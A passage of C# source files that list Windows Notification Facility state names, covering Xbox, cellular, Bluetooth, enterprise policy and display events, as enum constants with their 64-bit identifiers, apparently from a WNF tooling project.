WNF_XBOX_ERA_VM_INSTANCE_CHANGED = 0x19890C35A3BE0875UL,
WNF_XBOX_ERA_VM_STATUS_CHANGED = 0x19890C35A3BC8875UL,
WNF_XBOX_EXIT_SILENT_BOOT_MODE = 0x19890C35A3BCF875UL,
WNF_XBOX_EXTENDED_RESOURCE_MODE_CHANGED = 0x19890C35A3BDD875UL,
WNF_XBOX_GLOBAL_SPEECH_INPUT_NOTIFICATION = 0x19890C35A3BDF875UL,
WNF_XBOX_GLOBALIZATION_SETTING_CHANGED = 0x19890C35A3BC4875UL,
WNF_XBOX_HOST_STORAGE_CONFIGURATION_CHANGED = 0x19890C35A3BCF075UL,
WNF_XBOX_INPUT_ACTIVITY_RESUME = 0x19890C35A3BCD075UL,
WNF_XBOX_INPUT_IDLE_CHECKPOINT = 0x19890C35A3BCC075UL,
WNF_XBOX_INPUT_IDLE_SHUTDOWN = 0x19890C35A3BCC875UL,
WNF_XBOX_INPUT_RECEIVED = 0x19890C35A3BCB875UL,
WNF_XBOX_KINECT_IS_REQUIRED = 0x19890C35A3BE2875UL,
WNF_XBOX_LIVE_CONNECTIVITY_CHANGED = 0x19890C35A3BC7075UL,
WNF_XBOX_LIVETV_TUNER_COUNT_CHANGED = 0x19890C35A3BD9075UL,
WNF_XBOX_MSA_ENVIRONMENT_CONFIGURED = 0x19890C35A3BD2075UL,
WNF_XBOX_NARRATOR_RECT_CHANGED = 0x19890C35A3BDA875UL,
WNF_XBOX_NOTIFICATION_UNREAD_COUNT = 0x19890C35A3BDD075UL,
WNF_XBOX_PACKAGE_INSTALL_STATE_CHANGED = 0x19890C35A3BC3875UL,
WNF_XBOX_PACKAGE_STREAMING_STATE = 0x19890C35A3BD7075UL,
WNF_XBOX_PACKAGE_UNMOUNTED_FROM_SYSTEM_FOR_LAUNCH = 0x19890C35A3BC3075UL,
WNF_XBOX_PACKAGE_UNMOUNTED_FROM_SYSTEM_FOR_UNINSTALL = 0x19890C35A3BDB075UL,
WNF_XBOX_PASS3_UPDATE_NOTIFICATION = 0x19890C35A3BD1875UL,
WNF_XBOX_QUERY_UPDATE_NOTIFICATION = 0x19890C35A3BD8075UL,
WNF_XBOX_REMOTE_SIGNOUT = 0x19890C35A3BDE875UL,
WNF_XBOX_REPOSITORY_CHANGED = 0x19890C35A3BD8875UL,
WNF_XBOX_RESET_IDLE_TIMER = 0x19890C35A3BE1075UL,
WNF_XBOX_SEND_LTV_COMMAND_REQUESTED = 0x19890C35A3BDB875UL,
WNF_XBOX_SHELL_DATACACHE_ENTITY_CHANGED = 0x19890C35A3BDC075UL,
WNF_XBOX_SHELL_INITIALIZED = 0x19890C35A3BD0875UL,
WNF_XBOX_SHELL_TOAST_NOTIFICATION = 0x19890C35A3BC2875UL,
WNF_XBOX_SIP_FOCUS_TRANSFER_NOTIFICATION = 0x19890C35A3BD3875UL,
WNF_XBOX_SIP_VISIBILITY_CHANGED = 0x19890C35A3BD2875UL,
WNF_XBOX_STORAGE_CHANGED = 0x19890C35A3BD6875UL,
WNF_XBOX_STORAGE_ERROR = 0x19890C35A3BC6875UL,
WNF_XBOX_STORAGE_STATUS = 0x19890C35A3BD6075UL,
WNF_XBOX_STREAMING_QUEUE_CHANGED = 0x19890C35A3BD7875UL,
WNF_XBOX_SYSTEM_CONSTRAINED_MODE_STATUS_CHANGED = 0x19890C35A3BCA075UL,
WNF_XBOX_SYSTEM_GAME_STREAMING_STATE_CHANGED = 0x19890C35A3BD3075UL,
WNF_XBOX_SYSTEM_IDLE_TIMEOUT_CHANGED = 0x19890C35A3BC9875UL,
WNF_XBOX_SYSTEM_LOW_POWER_MAINTENANCE_WORK_ALLOWED = 0x19890C35A3BD5075UL,
WNF_XBOX_SYSTEM_TITLE_AUTH_STATUS_CHANGED = 0x19890C35A3BC7875UL,
WNF_XBOX_SYSTEM_USER_CONTEXT_CHANGED = 0x19890C35A3BCE075UL,
WNF_XBOX_SYSTEMUI_APP_LAUNCHED = 0x19890C35A3BCB075UL,
WNF_XBOX_TILE_CHANGED = 0x19890C35A3BD1075UL,
WNF_XBOX_XAM_SMB_SHARES_INIT_ALLOW_SYSTEM_READY = 0x19890C35A3BD4075UL,
WNF_XBOX_XBBLACKBOX_SNAP_NOTIFICATION = 0x19890C35A3BD4875UL
}
}
================================================
FILE: SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName1607.cs
================================================
namespace SharpWnfClient.Interop
{
internal enum WELL_KNOWN_WNF_NAME_1607 : ulong
{
WNF_A2A_APPURIHANDLER_INSTALLED = 0x41877C2CA3BC0875UL,
WNF_AI_USERTILE = 0x41C6072CA3BC0875UL,
WNF_AOW_BOOT_PROGRESS = 0x4191012CA3BC0875UL,
WNF_AUDC_CPUSET_ID = 0x02821B2CA3BC08B5UL,
WNF_AUDC_CPUSET_ID_SYSTEM = 0x02821B2CA3BC2875UL,
WNF_AUDC_HEALTH_PROBLEM = 0x02821B2CA3BC2075UL,
WNF_AUDC_PHONECALL_ACTIVE = 0x02821B2CA3BC1075UL,
WNF_AUDC_TUNER_DEVICE_AVAILABILITY = 0x02821B2CA3BC1875UL,
WNF_AVA_SOUNDDETECTOR_PATTERN_MATCH = 0x4187182CA3BC0875UL,
WNF_AVLC_DRIVER_REQUEST = 0x028A182CA3BC0875UL,
WNF_AVLC_SHOW_VOLUMELIMITWARNING = 0x028A182CA3BC1875UL,
WNF_AVLC_VOLUME_WARNING_ACCEPTED = 0x028A182CA3BC1075UL,
WNF_BI_APPLICATION_SERVICING_START_CHANNEL = 0x41C6072FA3BC3875UL,
WNF_BI_APPLICATION_SERVICING_STOP_CHANNEL = 0x41C6072FA3BC4075UL,
WNF_BI_APPLICATION_UNINSTALL_CHANNEL = 0x41C6072FA3BC3075UL,
WNF_BI_BI_READY = 0x41C6072FA3BC6835UL,
WNF_BI_BROKER_WAKEUP_CHANNEL = 0x41C6072FA3BC0875UL,
WNF_BI_EVENT_DELETION = 0x41C6072FA3BC5075UL,
WNF_BI_LOCK_SCREEN_UPDATE_CHANNEL = 0x41C6072FA3BC4875UL,
WNF_BI_NOTIFY_NEW_SESSION = 0x41C6072FA3BC7075UL,
WNF_BI_PSM_TEST_HOOK_CHANNEL = 0x41C6072FA3BC5875UL,
WNF_BI_QUERY_APP_USAGE = 0x41C6072FA3BC7875UL,
WNF_BI_QUIET_MODE_UPDATE_CHANNEL = 0x41C6072FA3BC6075UL,
WNF_BI_SESSION_CONNECT_CHANNEL = 0x41C6072FA3BC2075UL,
WNF_BI_SESSION_DISCONNECT_CHANNEL = 0x41C6072FA3BC2875UL,
WNF_BI_USER_LOGOFF_CHANNEL = 0x41C6072FA3BC1875UL,
WNF_BI_USER_LOGON_CHANNEL = 0x41C6072FA3BC1075UL,
WNF_BLTH_BLUETOOTH_AUDIO_GATEWAY_STATUS = 0x0992022FA3BC1075UL,
WNF_BLTH_BLUETOOTH_CONNECTION_STATE_CHANGE = 0x0992022FA3BC2075UL,
WNF_BLTH_BLUETOOTH_MAP_STATUS = 0x0992022FA3BC1875UL,
WNF_BLTH_BLUETOOTH_STATUS = 0x0992022FA3BC0875UL,
WNF_BMP_BG_PLAYBACK_REVOKED = 0x4196032FA3BC1075UL,
WNF_BMP_BG_PLAYSTATE_CHANGED = 0x4196032FA3BC0875UL,
WNF_BOOT_DIRTY_SHUTDOWN = 0x1589012FA3BC0875UL,
WNF_BOOT_INVALID_TIME_SOURCE = 0x1589012FA3BC1075UL,
WNF_BOOT_MEMORY_PARTITIONS_RESTORE = 0x1589012FA3BC1875UL,
WNF_CAPS_CENTRAL_ACCESS_POLICIES_CHANGED = 0x12960F2EA3BC0875UL,
WNF_CCTL_BUTTON_REQUESTS = 0x0D920D2EA3BC08B5UL,
WNF_CDP_CDP_ACTIVITIES_RECIEVED = 0x41960A2EA3BC3075UL,
WNF_CDP_CDP_MESSAGES_QUEUED = 0x41960A2EA3BC2875UL,
WNF_CDP_CDP_NOTIFICATION_ACTION_FORWARD_FAILURE = 0x41960A2EA3BC4075UL,
WNF_CDP_CDPSVC_READY = 0x41960A2EA3BC0875UL,
WNF_CDP_CDPSVC_STOPPING = 0x41960A2EA3BC1075UL,
WNF_CDP_CDPUSERSVC_READY = 0x41960A2EA3BC1875UL,
WNF_CDP_CDPUSERSVC_STOPPING = 0x41960A2EA3BC2075UL,
WNF_CDP_USERAUTH_POLICY_CHANGE = 0x41960A2EA3BC3875UL,
WNF_CELL_AIRPLANEMODE = 0x0D8A0B2EA3BC3075UL,
WNF_CELL_AIRPLANEMODE_DETAILS = 0x0D8A0B2EA3BC9075UL,
WNF_CELL_AVAILABLE_OPERATORS_CAN0 = 0x0D8A0B2EA3BC5075UL,
WNF_CELL_AVAILABLE_OPERATORS_CAN1 = 0x0D8A0B2EA3BD5875UL,
WNF_CELL_CALLFORWARDING_STATUS_CAN0 = 0x0D8A0B2EA3BD0075UL,
WNF_CELL_CALLFORWARDING_STATUS_CAN1 = 0x0D8A0B2EA3BDE075UL,
WNF_CELL_CAN_CONFIGURATION_SET_COMPLETE_MODEM0 = 0x0D8A0B2EA3BE5875UL,
WNF_CELL_CAN_STATE_CAN0 = 0x0D8A0B2EA3BC8075UL,
WNF_CELL_CAN_STATE_CAN1 = 0x0D8A0B2EA3BD9075UL,
WNF_CELL_CDMA_ACTIVATION_CAN0 = 0x0D8A0B2EA3BC4075UL,
WNF_CELL_CDMA_ACTIVATION_CAN1 = 0x0D8A0B2EA3BD4875UL,
WNF_CELL_CONFIGURED_LINES_CAN0 = 0x0D8A0B2EA3BDF475UL,
WNF_CELL_CONFIGURED_LINES_CAN1 = 0x0D8A0B2EA3BDFC75UL,
WNF_CELL_CSP_WWAN_PLUS_READYNESS = 0x0D8A0B2EA3BCF875UL,
WNF_CELL_DATA_ENABLED_BY_USER_MODEM0 = 0x0D8A0B2EA3BC6475UL,
WNF_CELL_DEVICE_INFO_CAN0 = 0x0D8A0B2EA3BC5875UL,
WNF_CELL_DEVICE_INFO_CAN1 = 0x0D8A0B2EA3BD6075UL,
WNF_CELL_EMERGENCY_CALLBACK_MODE_STATUS = 0x0D8A0B2EA3BE6875UL,
WNF_CELL_HOME_OPERATOR_CAN0 = 0x0D8A0B2EA3BCC075UL,
WNF_CELL_HOME_OPERATOR_CAN1 = 0x0D8A0B2EA3BDA875UL,
WNF_CELL_HOME_PRL_ID_CAN0 = 0x0D8A0B2EA3BCC875UL,
WNF_CELL_HOME_PRL_ID_CAN1 = 0x0D8A0B2EA3BDB075UL,
WNF_CELL_IMS_STATUS_CAN0 = 0x0D8A0B2EA3BE8075UL,
WNF_CELL_IMS_STATUS_CAN1 = 0x0D8A0B2EA3BE8875UL,
WNF_CELL_IMSI_CAN0 = 0x0D8A0B2EA3BE2075UL,
WNF_CELL_IMSI_CAN1 = 0x0D8A0B2EA3BE2875UL,
WNF_CELL_IWLAN_AVAILABILITY_CAN0 = 0x0D8A0B2EA3BE9075UL,
WNF_CELL_IWLAN_AVAILABILITY_CAN1 = 0x0D8A0B2EA3BE9875UL,
WNF_CELL_LEGACY_SETTINGS_MIGRATION = 0x0D8A0B2EA3BE3075UL,
WNF_CELL_NETWORK_TIME_CAN0 = 0x0D8A0B2EA3BC4875UL,
WNF_CELL_NETWORK_TIME_CAN1 = 0x0D8A0B2EA3BD5075UL,
WNF_CELL_OPERATOR_NAME_CAN0 = 0x0D8A0B2EA3BC3875UL,
WNF_CELL_OPERATOR_NAME_CAN1 = 0x0D8A0B2EA3BD4075UL,
WNF_CELL_PERSO_STATUS_CAN0 = 0x0D8A0B2EA3BCB875UL,
WNF_CELL_PERSO_STATUS_CAN1 = 0x0D8A0B2EA3BDE875UL,
WNF_CELL_PHONE_NUMBER_CAN0 = 0x0D8A0B2EA3BC6875UL,
WNF_CELL_PHONE_NUMBER_CAN1 = 0x0D8A0B2EA3BD7075UL,
WNF_CELL_POSSIBLE_DATA_ACTIVITY_CHANGE_MODEM0 = 0x0D8A0B2EA3BC9875UL,
WNF_CELL_POWER_STATE_MODEM0 = 0x0D8A0B2EA3BC0875UL,
WNF_CELL_PREFERRED_LANGUAGES_SLOT0 = 0x0D8A0B2EA3BE1075UL,
WNF_CELL_PREFERRED_LANGUAGES_SLOT1 = 0x0D8A0B2EA3BE1875UL,
WNF_CELL_PS_MEDIA_PREFERENCES_CAN0 = 0x0D8A0B2EA3BEA475UL,
WNF_CELL_PS_MEDIA_PREFERENCES_CAN1 = 0x0D8A0B2EA3BEAC75UL,
WNF_CELL_RADIO_TYPE_MODEM0 = 0x0D8A0B2EA3BD0C75UL,
WNF_CELL_REGISTRATION_CHANGED_TRIGGER_MV = 0x0D8A0B2EA3BE6075UL,
WNF_CELL_REGISTRATION_PREFERENCES_CAN0 = 0x0D8A0B2EA3BC7C75UL,
WNF_CELL_REGISTRATION_PREFERENCES_CAN1 = 0x0D8A0B2EA3BD8C75UL,
WNF_CELL_REGISTRATION_STATUS_CAN0 = 0x0D8A0B2EA3BC2075UL,
WNF_CELL_REGISTRATION_STATUS_CAN1 = 0x0D8A0B2EA3BD2075UL,
WNF_CELL_REGISTRATION_STATUS_DETAILS_CAN0 = 0x0D8A0B2EA3BCA875UL,
WNF_CELL_REGISTRATION_STATUS_DETAILS_CAN1 = 0x0D8A0B2EA3BD9875UL,
WNF_CELL_SIGNAL_STRENGTH_BARS_CAN0 = 0x0D8A0B2EA3BC1075UL,
WNF_CELL_SIGNAL_STRENGTH_BARS_CAN1 = 0x0D8A0B2EA3BD1075UL,
WNF_CELL_SIGNAL_STRENGTH_DETAILS_CAN0 = 0x0D8A0B2EA3BE7075UL,
WNF_CELL_SIGNAL_STRENGTH_DETAILS_CAN1 = 0x0D8A0B2EA3BE7875UL,
WNF_CELL_SUPPORTED_SYSTEM_TYPES_CAN0 = 0x0D8A0B2EA3BCB075UL,
WNF_CELL_SUPPORTED_SYSTEM_TYPES_CAN1 = 0x0D8A0B2EA3BDA075UL,
WNF_CELL_SYSTEM_CONFIG = 0x0D8A0B2EA3BCA475UL,
WNF_CELL_SYSTEM_TYPE_CAN0 = 0x0D8A0B2EA3BC1875UL,
WNF_CELL_SYSTEM_TYPE_CAN1 = 0x0D8A0B2EA3BD1875UL,
WNF_CELL_UICC_ATR_SLOT0 = 0x0D8A0B2EA3BE3875UL,
WNF_CELL_UICC_ATR_SLOT1 = 0x0D8A0B2EA3BE4075UL,
WNF_CELL_UICC_SIMSEC_SLOT0 = 0x0D8A0B2EA3BE4875UL,
WNF_CELL_UICC_SIMSEC_SLOT1 = 0x0D8A0B2EA3BE5075UL,
WNF_CELL_UICC_STATUS_DETAILS_SLOT0 = 0x0D8A0B2EA3BE0075UL,
WNF_CELL_UICC_STATUS_DETAILS_SLOT1 = 0x0D8A0B2EA3BE0875UL,
WNF_CELL_UICC_STATUS_SLOT0 = 0x0D8A0B2EA3BC2875UL,
WNF_CELL_UICC_STATUS_SLOT1 = 0x0D8A0B2EA3BD2875UL,
WNF_CELL_USER_PREFERRED_POWER_STATE_MODEM0 = 0x0D8A0B2EA3BC8C75UL,
WNF_CELL_UTK_PROACTIVE_CMD = 0x0D8A0B2EA3BCF075UL,
WNF_CELL_UTK_SETUP_MENU_SLOT0 = 0x0D8A0B2EA3BCE875UL,
WNF_CELL_UTK_SETUP_MENU_SLOT1 = 0x0D8A0B2EA3BDD075UL,
WNF_CELL_VOICEMAIL_NUMBER_CAN0 = 0x0D8A0B2EA3BC7075UL,
WNF_CELL_WIFI_CALL_SETTINGS_CAN0 = 0x0D8A0B2EA3BEB075UL,
WNF_CELL_WIFI_CALL_SETTINGS_CAN1 = 0x0D8A0B2EA3BEB875UL,
WNF_CFCL_SC_CONFIGURATIONS_ADDED = 0x0D85082EA3BC1875UL,
WNF_CFCL_SC_CONFIGURATIONS_CHANGED = 0x0D85082EA3BC0875UL,
WNF_CFCL_SC_CONFIGURATIONS_DELETED = 0x0D85082EA3BC1075UL,
WNF_CLIP_CONTENT_CHANGED = 0x118F022EA3BC0875UL,
WNF_CNET_CELLULAR_CONNECTIONS_AVAILABLE = 0x1583002EA3BC4875UL,
WNF_CNET_DPU_GLOBAL_STATE_NOT_TRACKED = 0x1583002EA3BC3075UL,
WNF_CNET_DPU_GLOBAL_STATE_OFF_TRACK = 0x1583002EA3BC1875UL,
WNF_CNET_DPU_GLOBAL_STATE_ON_TRACK = 0x1583002EA3BC2075UL,
WNF_CNET_DPU_GLOBAL_STATE_OVER_LIMIT = 0x1583002EA3BC1075UL,
WNF_CNET_DPU_GLOBAL_STATE_UNDER_TRACK = 0x1583002EA3BC2875UL,
WNF_CNET_NON_CELLULAR_CONNECTED = 0x1583002EA3BC6875UL,
WNF_CNET_NON_CELLULAR_CONNECTIONS_AVAILABLE = 0x1583002EA3BC5075UL,
WNF_CNET_RADIO_ACTIVITY_OR_NON_CELLULAR_CONNECTED = 0x1583002EA3BC7075UL,
WNF_CSC_SERVICE_START = 0x41851D2EA3BC0875UL,
WNF_DBA_DEVICE_ACCESS_CHANGED = 0x41870C29A3BC0875UL,
WNF_DEP_OOBE_COMPLETE = 0x41960B29A3BC0C75UL,
WNF_DEP_UNINSTALL_DISABLED = 0x41960B29A3BC1475UL,
WNF_DICT_CONTENT_CHANGED = 0x15850729A3BC0875UL,
WNF_DISK_SCRUB_REQUIRED = 0x0A950729A3BC0875UL,
WNF_DMF_MIGRATION_COMPLETE = 0x41800329A3BC1075UL,
WNF_DMF_MIGRATION_PROGRESS = 0x41800329A3BC1875UL,
WNF_DMF_MIGRATION_STARTED = 0x41800329A3BC0875UL,
WNF_DMF_UX_COMPLETE = 0x41800329A3BC2075UL,
WNF_DNS_ALL_SERVER_TIMEOUT = 0x41950029A3BC1075UL,
WNF_DO_MANAGER_ACTIVE = 0x41C60129A3BC0875UL,
WNF_DSM_DSMAPPINSTALLED = 0x418B1D29A3BC0C75UL,
WNF_DSM_DSMAPPREMOVED = 0x418B1D29A3BC1475UL,
WNF_DUSM_TASK_TOAST = 0x0C951B29A3BC0875UL,
WNF_DWM_RUNNING = 0x418B1929A3BC0835UL,
WNF_DX_COLOR_PROFILE_CHANGE = 0x41C61629A3BC7035UL,
WNF_DX_DEVICE_REMOVAL = 0x41C61629A3BC60B5UL,
WNF_DX_DISPLAY_CONFIG_CHANGE_NOTIFICATION = 0x41C61629A3BC5835UL,
WNF_DX_HARDWARE_CONTENT_PROTECTION_TILT_NOTIFICATION = 0x41C61629A3BC4075UL,
WNF_DX_INTERNAL_PANEL_DIMENSIONS = 0x41C61629A3BC4875UL,
WNF_DX_MODE_CHANGE_NOTIFICATION = 0x41C61629A3BC1035UL,
WNF_DX_MODERN_OUTPUTDUPLICATION = 0x41C61629A3BC5035UL,
WNF_DX_MODERN_OUTPUTDUPLICATION_CONTEXTS = 0x41C61629A3BC6835UL,
WNF_DX_MONITOR_CHANGE_NOTIFICATION = 0x41C61629A3BC2835UL,
WNF_DX_NETWORK_DISPLAY_STATE_CHANGE_NOTIFICATION = 0x41C61629A3BC2035UL,
WNF_DX_OCCLUSION_CHANGE_NOTIFICATION = 0x41C61629A3BC1835UL,
WNF_DX_STEREO_CONFIG = 0x41C61629A3BC0C75UL,
WNF_DX_VIDMM_BUDGETCHANGE_NOTIFICATION = 0x41C61629A3BC3875UL,
WNF_DX_VIDMM_TRIM_NOTIFICATION = 0x41C61629A3BC30B5UL,
WNF_DXGK_ADAPTER_TDR_NOTIFICATION = 0x0A811629A3BC0875UL,
WNF_EDP_AAD_REAUTH_REQUIRED = 0x41960A28A3BC3835UL,
WNF_EDP_APP_UI_ENTERPRISE_CONTEXT_CHANGED = 0x41960A28A3BC3035UL,
WNF_EDP_CLIPBOARD_METADATA_CHANGED = 0x41960A28A3BC2035UL,
WNF_EDP_DIALOG_CANCEL = 0x41960A28A3BC2835UL,
WNF_EDP_DPL_KEYS_DROPPING = 0x41960A28A3BC5875UL,
WNF_EDP_DPL_KEYS_STATE = 0x41960A28A3BC1875UL,
WNF_EDP_ENTERPRISE_CONTEXTS_UPDATED = 0x41960A28A3BC4475UL,
WNF_EDP_IDENTITY_REVOKED = 0x41960A28A3BC10F5UL,
WNF_EDP_PROCESS_TLS_INDEX = 0x41960A28A3BC50B5UL,
WNF_EDP_PROCESS_UI_ENFORCEMENT = 0x41960A28A3BC4875UL,
WNF_EDP_TAGGED_APP_LAUNCHED = 0x41960A28A3BC0835UL,
WNF_EFS_SERVICE_START = 0x41950828A3BC0875UL,
WNF_EFS_SOFTWARE_HIVE_AVAILABLE = 0x41950828A3BC1075UL,
WNF_ENTR_ABOVELOCK_POLICY_VALUE_CHANGED = 0x13920028A3BC7875UL,
WNF_ENTR_ACCOUNTS_POLICY_VALUE_CHANGED = 0x13920028A3BC3075UL,
WNF_ENTR_ALLOW_WBA_EXECUTION_POLICY_VALUE_CHANGED = 0x13920028A3BD3875UL,
WNF_ENTR_ALLOWALLTRUSTEDAPPS_POLICY_VALUE_CHANGED = 0x13920028A3BCF875UL,
WNF_ENTR_ALLOWAPPLICATIONS_POLICY_VALUE_CHANGED = 0x13920028A3BC8075UL,
WNF_ENTR_ALLOWCELLULARDATA_POLICY_VALUE_CHANGED = 0x13920028A3BD5075UL,
WNF_ENTR_ALLOWCELLULARDATAROAMING_POLICY_VALUE_CHANGED = 0x13920028A3BD4875UL,
WNF_ENTR_ALLOWDEVELOPERUNLOCK_POLICY_VALUE_CHANGED = 0x13920028A3BD1875UL,
WNF_ENTR_ALLOWINPUTPANEL_POLICY_VALUE_CHANGED = 0x13920028A3BCA875UL,
WNF_ENTR_ALLOWMANUALWIFICONFIGURATION_POLICY_VALUE_CHANGED = 0x13920028A3BDB875UL,
WNF_ENTR_ALLOWMESSAGESYNC_POLICY_VALUE_CHANGED = 0x13920028A3BD6875UL,
WNF_ENTR_ALLOWNONMICROSOFTSIGNEDUPDATE_POLICY_VALUE_CHANGED = 0x13920028A3BD3075UL,
WNF_ENTR_ALLOWSHAREDUSERDATA_POLICY_VALUE_CHANGED = 0x13920028A3BD0075UL,
WNF_ENTR_ALLOWUPDATESERVICE_POLICY_VALUE_CHANGED = 0x13920028A3BD2075UL,
WNF_ENTR_ALLOWWIFI_POLICY_VALUE_CHANGED = 0x13920028A3BDB075UL,
WNF_ENTR_APPLICATIONMANAGEMENT_POLICY_VALUE_CHANGED = 0x13920028A3BC5875UL,
WNF_ENTR_BLUETOOTH_POLICY_VALUE_CHANGED = 0x13920028A3BCD875UL,
WNF_ENTR_BROWSER_POLICY_VALUE_CHANGED = 0x13920028A3BC4075UL,
WNF_ENTR_CAMERA_POLICY_VALUE_CHANGED = 0x13920028A3BC5075UL,
WNF_ENTR_CONNECTIVITY_POLICY_VALUE_CHANGED = 0x13920028A3BC2075UL,
WNF_ENTR_CONTEXT_STATE_CHANGE = 0x13920028A3BC9875UL,
WNF_ENTR_DEVICELOCK_POLICY_VALUE_CHANGED = 0x13920028A3BC0875UL,
WNF_ENTR_DISABLEADVERTISINGID_POLICY_VALUE_CHANGED = 0x13920028A3BD7075UL,
WNF_ENTR_DOMAIN_NAMES_FOR_EMAIL_SYNC_POLICY_VALUE_CHANGED = 0x13920028A3BD4075UL,
WNF_ENTR_EDPENFORCEMENTLEVEL_CACHED_POLICY_VALUE_CHANGED = 0x13920028A3BD5C75UL,
WNF_ENTR_EDPENFORCEMENTLEVEL_POLICY_VALUE_CHANGED = 0x13920028A3BC8875UL,
WNF_ENTR_EDPNETWORKING_POLICY_VALUE_CHANGED = 0x13920028A3BCE075UL,
WNF_ENTR_EDPSHOWICONS_CACHED_POLICY_VALUE_CHANGED = 0x13920028A3BD9C75UL,
WNF_ENTR_EVALUATE_EDP_CONFIGURATION_STATE = 0x13920028A3BD7875UL,
WNF_ENTR_EXPERIENCE_POLICY_VALUE_CHANGED = 0x13920028A3BC2875UL,
WNF_ENTR_NETWORKISOLATION_POLICY_VALUE_CHANGED = 0x13920028A3BD8875UL,
WNF_ENTR_PROTECTEDDOMAINNAMES_CACHED_POLICY_VALUE_CHANGED = 0x13920028A3BD6475UL,
WNF_ENTR_PUSH_NOTIFICATION_RECEIVED = 0x13920028A3BC6875UL,
WNF_ENTR_PUSH_RECEIVED = 0x13920028A3BCA075UL,
WNF_ENTR_REQUIRE_DEVICE_ENCRYPTION_POLICY_VALUE_CHANGED = 0x13920028A3BC6075UL,
WNF_ENTR_REQUIRE_DPL_POLICY_VALUE_CHANGED = 0x13920028A3BCE875UL,
WNF_ENTR_RESTRICTAPPDATATOSYTEMVOLUME_POLICY_VALUE_CHANGED = 0x13920028A3BD1075UL,
WNF_ENTR_RESTRICTAPPTOSYTEMVOLUME_POLICY_VALUE_CHANGED = 0x13920028A3BD0875UL,
WNF_ENTR_SEARCH_ALLOW_INDEXING_ENCRYPTED_STORES_OR_ITEMS = 0x13920028A3BCD075UL,
WNF_ENTR_SEARCH_ALLOW_USING_DIACRITICS = 0x13920028A3BCB075UL,
WNF_ENTR_SEARCH_ALWAYS_USE_AUTO_LANG_DETECTION = 0x13920028A3BCB875UL,
WNF_ENTR_SEARCH_DISABLE_REMOVABLE_DRIVE_INDEXING = 0x13920028A3BCC075UL,
WNF_ENTR_SEARCH_POLICY_VALUE_CHANGED = 0x13920028A3BC7075UL,
WNF_ENTR_SEARCH_PREVENT_INDEXING_LOW_DISK_SPACE_MB = 0x13920028A3BCC875UL,
WNF_ENTR_SECURITY_POLICY_VALUE_CHANGED = 0x13920028A3BC3875UL,
WNF_ENTR_SYSTEM_POLICY_VALUE_CHANGED = 0x13920028A3BC1875UL,
WNF_ENTR_UPDATE_POLICY_VALUE_CHANGED = 0x13920028A3BC4875UL,
WNF_ENTR_UPDATESERVICEURL_POLICY_VALUE_CHANGED = 0x13920028A3BD2875UL,
WNF_ENTR_WAP_MESSAGE_FOR_DMWAPPUSHSVC_READY = 0x13920028A3BC9075UL,
WNF_ENTR_WIFI_POLICY_VALUE_CHANGED = 0x13920028A3BC1075UL,
WNF_ENTR_WINDOWS_DEFENDER_POLICY_VALUE_CHANGED = 0x13920028A3BCF075UL,
WNF_ETW_SUBSYSTEM_INITIALIZED = 0x41911A28A3BC0875UL,
WNF_EXEC_OSTASKCOMPLETION_REVOKED = 0x02831628A3BC0875UL,
WNF_EXEC_THERMAL_LIMITER_CLOSE_APPLICATION_VIEWS = 0x02831628A3BC1875UL,
WNF_EXEC_THERMAL_LIMITER_DISPLAY_WARNING = 0x02831628A3BC2875UL,
WNF_EXEC_THERMAL_LIMITER_STOP_MRC = 0x02831628A3BC3075UL,
WNF_EXEC_THERMAL_LIMITER_TERMINATE_BACKGROUND_TASKS = 0x02831628A3BC2075UL,
WNF_FDBK_QUESTION_NOTIFICATION = 0x0A840A2BA3BC0875UL,
WNF_FLT_RUNDOWN_WAIT = 0x4192022BA3BC0875UL,
WNF_FLYT_IDS_CHANGED = 0x159F022BA3BC0875UL,
WNF_FOD_STATE_CHANGE = 0x4182012BA3BC0875UL,
WNF_FSRL_OPLOCK_BREAK = 0x0D941D2BA3BC1075UL,
WNF_FSRL_TIERED_VOLUME_DETECTED = 0x0D941D2BA3BC0875UL,
WNF_FVE_BDESVC_TRIGGER_START = 0x4183182BA3BC3075UL,
WNF_FVE_DE_MANAGED_VOLUMES_COUNT = 0x4183182BA3BC1075UL,
WNF_FVE_DE_SUPPORT = 0x4183182BA3BC0875UL,
WNF_FVE_WIM_HASH_DELETION_TRIGGER = 0x4183182BA3BC2875UL,
WNF_FVE_WIM_HASH_GENERATION_COMPLETION = 0x4183182BA3BC2075UL,
WNF_FVE_WIM_HASH_GENERATION_TRIGGER = 0x4183182BA3BC1875UL,
WNF_GLOB_USERPROFILE_LANGLIST_CHANGED = 0x0389022AA3BC0875UL,
WNF_GPOL_SYSTEM_CHANGES = 0x0D891E2AA3BC0875UL,
WNF_GPOL_USER_CHANGES = 0x0D891E2AA3BC10F5UL,
WNF_HAS_VERIFY_HEALTH_CERT = 0x41950F25A3BC0875UL,
WNF_HVL_CPU_MGMT_PARTITION = 0x418A1825A3BC0875UL,
WNF_IME_EXPLICIT_PRIVATE_MODE = 0x41830324A3BC1035UL,
WNF_IME_INPUT_MODE_LABEL = 0x41830324A3BC0875UL,
WNF_IMSN_IMMERSIVEMONITORCHANGED = 0x0F950324A3BC1835UL,
WNF_IMSN_KILL_LOGICAL_FOCUS = 0x0F950324A3BC3035UL,
WNF_IMSN_LAUNCHERVISIBILITY = 0x0F950324A3BC1035UL,
WNF_IMSN_MONITORMODECHANGED = 0x0F950324A3BC0835UL,
WNF_IMSN_PROJECTIONDISPLAYAVAILABLE = 0x0F950324A3BC3835UL,
WNF_IOT_EMBEDDED_MODE_POLICY_VALUE_CHANGED = 0x41920124A3BC0875UL,
WNF_IOT_STARTUP_SETTINGS_CHANGED = 0x41920124A3BC1075UL,
WNF_ISM_LAST_USER_ACTIVITY = 0x418B1D24A3BC0835UL,
WNF_IUIS_SCALE_CHANGED = 0x128F1B24A3BC0835UL,
WNF_KSV_DEVICESTATE = 0x41901D26A3BC1075UL,
WNF_KSV_STREAMSTATE = 0x41901D26A3BC0875UL,
WNF_LANG_FOD_INSTALLATION_STARTED = 0x06880F21A3BC0875UL,
WNF_LFS_ACTION_DIALOG_AVAILABLE = 0x41950821A3BC4875UL,
WNF_LFS_CLIENT_RECALCULATE_PERMISSIONS = 0x41950821A3BC3875UL,
WNF_LFS_GEOFENCETRACKING_STATE = 0x41950821A3BC2075UL,
WNF_LFS_MASTERSWITCH_STATE = 0x41950821A3BC1875UL,
WNF_LFS_PERMISSION_TO_SHOW_ICON_CHANGED = 0x41950821A3BC4075UL,
WNF_LFS_POSITION_AVAILABLE = 0x41950821A3BC3075UL,
WNF_LFS_RESERVED_WNF_EVENT_2 = 0x41950821A3BC2875UL,
